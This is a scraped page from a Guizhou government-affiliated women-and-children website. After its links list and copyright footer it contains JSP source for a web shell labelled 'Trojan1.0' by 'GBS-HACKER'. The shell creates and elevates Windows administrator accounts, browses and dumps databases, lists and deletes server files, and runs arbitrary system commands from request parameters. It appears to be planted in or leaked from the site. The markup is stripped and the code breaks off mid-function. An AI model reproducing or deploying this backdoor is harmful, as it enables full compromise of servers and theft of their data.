友情链接
- 国务院妇女儿童工作委员会
- 中国关心下一代工作委员会
- 中国文明网
- 贵州妇女网
- 中国家庭教育
- 贵州农经网
- 贵州省人民政府网
- 贵州省关心下一代工作委员会
- 贵州文明网
- 贵州电视台
- 中国儿童资源网
- 金黔在线
- 青神县留守儿童教育保护网
- 广东妇女儿童发展规划信息网
- 天天315维权防骗网
- 西西游戏网
- MSSHE大码女装
- 少儿信息港
CopyRight 2007 www.gznw.gov.cn All Rights Reserved.
主办单位:共青团贵州省委 贵州省妇女联合会 贵州省气象局
承办单位:贵州省农村综合经济信息中心 黔B2-20030009
联系电话:(0851)5507983 E-mail:gznw@gznw.com
建议使用 IE 6.0以上版本进行浏览,最佳显示800*600
"); out.println("Operation_File
"); out.println("Author:GBS-HACKER
"); out.println("Version:Trojan1.0
"); out.println("File-URL:"+request.getRequestURL()+"
"); out.println("Port:"+request.getServerPort()+"
"); out.println("System:"+System.getProperty("os.name")+"
"); out.println("ServerName:"+application.getServerInfo()+"
"); out.println("java.vm.version:"+System.getProperty("java.vm.version")+"
"); if(request.getParameter("ctrl")!=null&&request.getParameter("ctrl")!=""){ if(request.getParameter("ctrl").trim().toString().equals("User")){ out.println("Operation_Adduser Of win xp,win2000,win2003"); out.println(""); if(request.getParameter("username")!=null&&request.getParameter("password")!=null){ boolean b = cmd(request.getParameter("username"),request.getParameter("password")); if(b){ out.println("Congratulations: the successful operation!"); out.println("激活用户"+request.getParameter("username")+""); }else{ out.println("Very unfortunate: There are several reasons...!
"); out.println("1:Does not have permission!
"); out.println("1:User already exists!
"); out.println("1:System does not support!
"); } } if(request.getParameter("username")!=null&&request.getParameter("active")!=null){ boolean b = Active(request.getParameter("username").trim(),request.getParameter("active").trim()); if(b){ out.println("Congratulations: the successful operation!"); out.println("提升至管理员"+request.getParameter("username")+""); }else{ out.println("Very unfortunate: There are several reasons...!
"); out.println("1:Does not have permission!
"); out.println("1:System does not support!
"); } } if(request.getParameter("username")!=null&&request.getParameter("administartor")!=null){ boolean b = administrator(request.getParameter("username").trim()); if(b){ out.println("Congratulations: the successful operation!"); out.println("Test:Port is 3389 Test login Not success?"); }else{ out.println("Very unfortunate: There are several reasons...!
"); out.println("1:Does not have permission!
"); out.println("1:System does not support!
"); } } String userlist = cc(userlist()); out.println("UserList:
"); out.println("
"+userlist+"
");
String serverinfo = cc(serverinfo());
out.println("Run Port:"); out.println("
"+serverinfo+"
");
}
if(request.getParameter("ctrl").trim().toString().equals("Database")){
String db1="",db2="",db3="",db4="",db5="";
if(request.getParameter("dbserver")!=null){db1=request.getParameter("dbserver");}
if(request.getParameter("database")!=null){db2=request.getParameter("database");}
if(request.getParameter("port")!=null){db3=request.getParameter("port");}
if(request.getParameter("dbname")!=null){db4=request.getParameter("dbname");}
if(request.getParameter("dbpass")!=null){db5=request.getParameter("dbpass");}
out.println("Operation_Database"); if(request.getParameter("Exhaustive")!=null&&"Exhaustive".equals(request.getParameter("Exhaustive"))){ String driverto="",urlto="",usernameto="",passwordto="",dbb="",dbnm="",dbpa=""; driverto = request.getParameter("driverto").toString(); urlto = request.getParameter("urlto").toString(); usernameto = request.getParameter("usernameto").toString(); passwordto = request.getParameter("passwordto").toString(); dbb = request.getParameter("dbb").toString(); dbnm = request.getParameter("dbnm").toString(); dbpa = request.getParameter("dbpa").toString(); List dblist = new ArrayList(); List nmlist = new ArrayList(); List palist = new ArrayList(); Connection con = getconn(driverto,urlto,usernameto,passwordto); if(con!=null){ } } out.println(""); String driver="",url="",user="",pass="",ports="",db=""; if(request.getParameter("dbserver")!=null&&request.getParameter("database")!=null&&request.getParameter("port")!=null&&request.getParameter("dbname")!=null&&request.getParameter("dbpass")!=null){ user = request.getParameter("dbname").trim(); pass = request.getParameter("dbpass").trim(); ports = request.getParameter("port").trim(); db = request.getParameter("database").trim(); if(request.getParameter("dbserver").equals("1")){ driver = "com.mysql.jdbc.Driver"; url ="jdbc:mysql://localhost:"+ports+"/"+db; Connection con = getconn(driver,url,user,pass); if(conn!=null){ out.println("Mysql Connection Success!Close Connection?"); }else{ out.println("Mysql Connection Failure!"); } } if(request.getParameter("dbserver").equals("2")){ driver = "com.microsoft.jdbc.sqlserver.SQLServerDriver"; url ="jdbc:microsoft:sqlserver://localhost:"+ports+";DatabaseName="+db; Connection con = getconn(driver,url,user,pass); if(conn!=null){ out.println("SQLServer Connection Success!Close Connection?"); rs = getrs("select * from sysobjects where type='u'"); if(rs!=null){ out.println("
Table List:
"); while(rs.next()){ out.println(""+rs.getString("name")+"
"); } if(request.getParameter("table")!=null&&request.getParameter("id")!=null){ String str = "select * from syscolumns where id="+request.getParameter("id").trim(); rs = getrs(str); out.println("
| "+rs.getString("name")+" | "); lum.add(rs.getString("name")); } String ing = "select top 10 * from ["+request.getParameter("table")+"]"; ResultSet rsing = getrs(ing); while(rsing.next()){ out.println("
"); out.println("
sql is:"+ing+"
"); out.println("Close Connection?"); } out.println("Command:
"); out.println(""); }else{ out.println("Not Table?"); } }else{ out.println("SQLServer Connection Failure!"); } } if(request.getParameter("dbserver").equals("3")){ driver = "com.ibm.db2.jdbc.app.DB2Driver"; url ="jdbc:db2://localhost:"+ports+"/"+db; Connection con = getconn(driver,url,user,pass); if(conn!=null){ out.println("DB2 Connection Success!Close Connection?"); }else{ out.println("DB2 Connection Failure!"); } } if(request.getParameter("dbserver").equals("4")){ driver = "oracle.jdbc.driver.OracleDriver"; url ="jdbc:oracle:thin:@localhost:"+ports+":"+db; Connection con = getconn(driver,url,user,pass); if(conn!=null){ out.println("Oracle Connection Success!Close Connection?"); }else{ out.println("Oracle Connection Failure!"); } } }else{ out.println("Please fill out the information......BackTo
"); } if(request.getParameter("close")!=null&&request.getParameter("close").equals("close")){ closeconn(); out.println("Close Connection Success!"); } } if(request.getParameter("ctrl").trim().toString().equals("File")){ String fileurl = ""; if(request.getParameter("fielis")!=null){ fileurl =charsetConverse(request.getParameter("fielis").trim().toString()); }else{ fileurl ="c:\\\\"; } out.println(""); File[] fr = File.listRoots(); out.println("Server Existing logical:"); for(int i=0;i
"+"
"); if(request.getParameter("fd")!=null){ if(delfile(charsetConverse(request.getParameter("fd").trim()))){ out.println("ResultSet:success!
"); }else{ out.println("ResultSet:failure!System does not support...
"); } } out.println("DIR:
"); List d = getDir(fileurl); if(d.size()>0){ for(int i=0;i
"); } }else{ out.println("没有文件以及目录!
"); } out.println("FILE:
"); List l = getFile(fileurl); if(l.size()>0){ for(int i=0;i
"); } }else{ out.println("Not File!"); } out.println("
"); } if(request.getParameter("ctrl").trim().toString().equals("Cmd")){ out.println("Operation_Cmd"); out.println("
"); if(request.getParameter("execof")!=null){ String s= cc(cmdall(request.getParameter("execof").trim())); out.println("ResultSet:
"); out.println("
"+s+"
");
}else{
out.println("Start Game!");
}
}
}else{
out.println("Start Success!");
}
out.println("");
out.println("");
%>
<%!
public static List getFile(String fileurl){
List filelist = new ArrayList();
File file = new File(fileurl);
if(file.isDirectory()){
File[] f=file.listFiles();
if(f.length>0){
for(int i=0;i